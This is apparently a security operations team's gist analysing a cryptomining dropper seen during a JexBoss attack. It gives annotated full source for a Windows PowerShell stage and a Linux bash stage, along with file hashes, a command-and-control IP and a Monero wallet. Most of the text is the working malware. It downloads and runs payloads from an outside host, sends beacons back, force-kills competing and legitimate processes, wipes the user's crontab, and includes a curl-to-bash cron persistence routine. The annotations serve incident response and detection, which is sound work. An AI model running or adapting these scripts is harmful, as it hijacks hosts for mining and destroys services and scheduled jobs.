Last active
November 2, 2018 22:44
This was observed by our SOC during an unsuccessful JexBoss attack. We're calling it NineBooms.
# --- Windows first stage (win.txt), analyst annotations ---
# One sample of the per-process "% Processor Time" counter. For each sample, InstanceName is the
# process name (no .exe suffix) and CookedValue is the measured CPU percentage.
$counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples | |
# Competitor kill-list #1. Besides rival miner/bot names it contains legitimate Windows and server
# process names (lsass, csrss, smss, svchost, services, winlogon, explorer, chrome, java, mysql, ...).
# Matching is gated on >=50% CPU in the loop below, so a busy legitimate process is still collateral
# damage. The array literal continues on the following line.
$malwares = "Kilence","alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7"
,"tomcat6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter" | |
# Competitor kill-list #2: mostly look-alike system names (win1ogin, svchosts3, taskhots, ...) and
# known miner binaries. Matched WITHOUT a CPU threshold in the second inner loop below.
$malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows" | |
foreach ($counter in $counters) { | |
# Only samples at >=50% CPU are compared against list #1; the idle/_total skip lives inside this
# branch, so those two instances still fall through to the list #2 pass below.
if ($counter.CookedValue -ge 50) { | |
if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") { | |
continue | |
} | |
# -eq on strings is case-insensitive in PowerShell; a match force-kills every process of that name.
foreach ($malware in $malwares) { | |
if ($counter.InstanceName -eq $malware) { | |
Stop-Process -processname $counter.InstanceName -Force | |
} | |
} | |
} | |
# Second pass, outside the CPU gate: any name in list #2 is killed regardless of its CPU usage.
foreach ($malware2 in $malwares2) { | |
if ($counter.InstanceName -eq $malware2) { | |
Stop-Process -processname $counter.InstanceName -Force | |
} | |
} | |
} | |
# Assigned but never referenced anywhere in this script.
$SELF_COPY = "$HOME\win.txt" | |
# C2 / payload host. The same base URL serves the EXE and receives the ?info= beacons — one network
# indicator covers both download and check-in traffic.
$HSST = "http://200.7.97.205:8086" | |
$CALLBACK = $HSST | |
# 64-bit and 32-bit payload variants; dropped under a fixed file name in the user's %TMP%.
$DEFAULT_RFILE = "$HSST/64Kilences.exe" | |
$OTHERS_RFILE = "$HSST/32Kilences.exe" | |
$LFILE_PATH = "$env:TMP\Drive.exe" | |
# Plain WebClient fetch over HTTP; no integrity or signature check appears anywhere in this script.
$DOWNLOADER = New-Object System.Net.WebClient | |
# Pointer size picks the build (8 bytes -> 64-bit). Note the download runs BEFORE the "already
# running" check, so Drive.exe is (re)written to disk on every execution.
$SYSTEM_BIT = [System.IntPtr]::Size | |
if ( $SYSTEM_BIT -eq 8 ) { | |
$DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH) | |
} else { | |
$DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH) | |
} | |
# Guard process "systemgo" — presumably the name the dropped payload runs as (not shown here).
# Absent: beacon ?info=w0 and launch the dropped file via cmd.exe; present: beacon ?info=w9 only.
# The w0/w9 query strings are a cheap proxy/IDS signature for this stage.
if ( !(Get-Process systemgo -ErrorAction SilentlyContinue) ) { | |
$DOWNLOADER.DownloadString("$CALLBACK/?info=w0") | |
cmd.exe /c $LFILE_PATH | |
} else { | |
$DOWNLOADER.DownloadString("$CALLBACK/?info=w9") | |
} |
A Linux version was found on the same malicious site:
MD5 (BoomBoom) = f75a3ee5fba082e6ccc38373cff39176
MD5 (BoomBoom2) = 2e49d437c95119becb881a3a269832d6
MD5 (lin.txt) = 0d3784ddb430cdeb2f0641a68b7715e4
# --- Linux dropper (lin.txt), analyst annotations ---
# Appends the usual tool directories so curl/ps/pkill resolve even under a minimal cron or service PATH.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# C2 / payload host, written as host:port with no scheme (curl treats a scheme-less URL as http).
HOST=200.7.97.205:8086
# Beacon target — identical to the payload host, so one network indicator covers both.
CALLBACK=$HOST
# Downloader command; expanded unquoted below, so the trailing space is harmless. wget variant left disabled.
DOWNLOADER="curl "
#DOWNLOADER="wget -q -O - "
# Payload is dropped under a fixed, predictable name in /tmp (no mktemp) — a stable file-system indicator.
LFILE_NAME="BoomBoom"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
# Two payload variants; which one is fetched is decided by the getconf test at the bottom of the script.
DEFAULT_RFILE=$HOST/BoomBoom
OTHERS_RFILE=$HOST/BoomBoom2
# Competitor eviction. Kills any process whose ps line or command line contains one of the substrings
# below (rival miner binaries, pool hostnames, Monero wallet addresses, other families' script names)
# and removes a few of their files. Every pattern here is ready-made detection content for the
# competing families — and several are broad enough to kill legitimate daemons (see notes inline).
CLEAN ()
{
# Substrings matched against `ps auxf` output. Unquoted and unanchored, so e.g. "sb1" or "wipefs"
# matches anywhere in a process line, including arguments.
KILIST=(crobon sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
# RMLIST is never assigned anywhere in this file; unless it is inherited from the environment this
# loop iterates nothing and is dead code.
for item in ${RMLIST[@]}
do
rm -rf $item
done
# The kill idiom used throughout: list processes, drop the grep itself, substring-match, SIGKILL.
for item in ${KILIST[@]}
do
ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
done
# Days since the Unix epoch; the grep on it below kills any process whose ps line happens to contain
# that number (presumably a competitor that embeds the day count in a name — not shown here).
days=$(($(date +%s) / 60 / 60 / 24))
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
# The wallet on the next line is the one the gist comment identifies as this campaign's own; killing
# its matches here suggests it also evicts earlier copies of itself.
ps auxf|grep -v grep|grep "45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
# "kworker" matches kernel worker threads (which generally ignore signals) as well as any miner
# masquerading under that name.
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
# pkill -f matches the full command line. Note the collateral patterns in this run: "curl" kills every
# curl on the host (including one feeding a `curl ... | bash` delivery), "yam"/"xmr"/"miner" hit any
# command line containing those letters.
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f Silence
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f curl
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
# Bare port/number substring — matches PIDs, arguments or ports alike.
ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
# Jenkins-related eviction: appears to target a rival that runs as "./<digits> -c" under a Jenkins
# tree. The ps ax grep chain has no `grep -v grep` and kills whatever matches "\-c" in the filtered lines.
pkill -f biosetjenkins
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
# "irqa" in /tmp: kill the children (via ps --ppid) first, then the parents.
ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs ps --ppid|awk '{print $1}'|grep -v PID|xargs kill -9
ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs kill -9
# Rival C2/pool IPs (45.76.102.45, 108.61.186.224, 45.76.146.166, 188.120.247.175) are matched on
# the command line — worth carrying into network blocklists alongside this campaign's own host.
# System-daemon names in this run (sleep, irqbalance, polkitd, acpid) are killed indiscriminately.
pkill -f 45.76.102.45
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f sleep
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
# '.so' is an unescaped regex: "." is any character, so this matches every ps line containing "so"
# preceded by anything, not just shared-object names. cut -c 9-15 also assumes a fixed-width PID
# column in `ps -ef` output. Broadest kill in the function.
ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
pkill -f 45.76.146.166
pkill -f irqbalanc1
pkill -f 188.120.247.175
# File artifacts of other families removed from /tmp — their absence on a host does not rule those
# families out, since this script deletes them on every run.
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
}
# 64-bit path (selected by the getconf test at the bottom): fetch the payload over plain HTTP into
# /tmp, mark it executable and start it unless a "BoomBoom" process already exists. No integrity
# check of any kind on the downloaded file.
DEFAULT ()
{
$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
# "$?" below is the status of the final `grep -v grep`: non-zero when no process line contains the
# substring "BoomBoom" (any process whose command line contains it counts as "running").
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
# Not running: launch with -B (the flag's meaning is inside the binary, not shown here) and, only if
# the launch command succeeds, beacon ?info=l60.
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
else
# Already running: beacon ?info=l69 only. The l60/l69 query strings are a cheap proxy/IDS signature.
$DOWNLOADER "${CALLBACK}/?info=l69"
fi
}
# Non-64-bit path: identical to DEFAULT except for the payload URL (BoomBoom2) and the beacon codes
# (l30 = launched, l39 = already running). Same plain-HTTP fetch, same /tmp drop, no integrity check.
OTHERS ()
{
$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
# "$?" is the status of `grep -v grep`: non-zero when no process line contains "BoomBoom".
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
else
$DOWNLOADER "${CALLBACK}/?info=l39"
fi
}
# Crontab persistence (every 8 minutes, re-fetch lin.txt and pipe it to bash). Not invoked in this
# sample: the call at the bottom of the script is commented out. The crontab lines are written in
# single quotes, so the installed entry would contain the literal text "$HOST/lin.txt" — a distinctive
# artifact to look for in user crontabs.
CRON () {
if [ -x /usr/bin/wget ] ; then
echo '*/8 * * * * wget -q -O - $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron
elif [ -x /usr/bin/curl ] ; then
echo '*/8 * * * * curl $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron
else
# exit, not return: with neither downloader present this terminates the whole script here.
exit 0;
fi
# Replaces (does not merge with) the invoking user's existing crontab — any legitimate jobs are lost.
# The temp file /tmp/.BoomBoom.cron is removed immediately, so it only exists transiently.
crontab -r
crontab /tmp/.$LFILE_NAME.cron
rm /tmp/.$LFILE_NAME.cron
}
# Raises the kernel huge-page pool through both interfaces, with no privilege or error check (both
# writes need root). A non-default vm.nr_hugepages=128 on an unmanaged host is a host-level indicator
# consistent with this family; what the payload does with the pages is not shown here.
INIT () {
echo 128 > /proc/sys/vm/nr_hugepages
sysctl -w vm.nr_hugepages=128
}
# Not called from the visible script body. SIGKILLs every process whose `ps aux` %CPU column exceeds
# 20, except lines mentioning "sourplum" (presumably the payload's own marker — not shown here).
# Indiscriminate: any legitimate high-CPU workload would be terminated.
KILL () {
ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
do
kill -9 $procid
done
}
# Execution order: evict competitors, tune huge pages, then fetch and run the architecture-matched payload.
CLEAN
INIT
# WORD_BIT=32 together with LONG_BIT=64 identifies an LP64 (x86_64) host -> 64-bit binary; anything
# else gets the 32-bit build. The substitutions are unquoted, so a missing getconf yields an empty
# operand, the `[` test complains and fails, and OTHERS is chosen.
if [ $(getconf WORD_BIT) = '32' ] && [ $(getconf LONG_BIT) = '64' ] ; then
DEFAULT
else
OTHERS
fi
# CRON
# Cron persistence is disabled, yet the invoking user's crontab is still wiped — a side effect worth
# recording during incident response (lost scheduled jobs are an artifact of this stage).
crontab -r
The Monero wallet is 45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA; it is searchable on MineXMR.com and appears to have generated around $3200 at the current exchange rate.
Awesome find, thank you for the contribution!
MD5 (32Kilences.exe) = 5f980357049bec59acf4fa3f64ad076f
MD5 (64Kilences.exe) = 41f120f918d226275471e00f1fd7bd2f
MD5 (win.txt) = e7f9375443cd29f771875c185062c6ba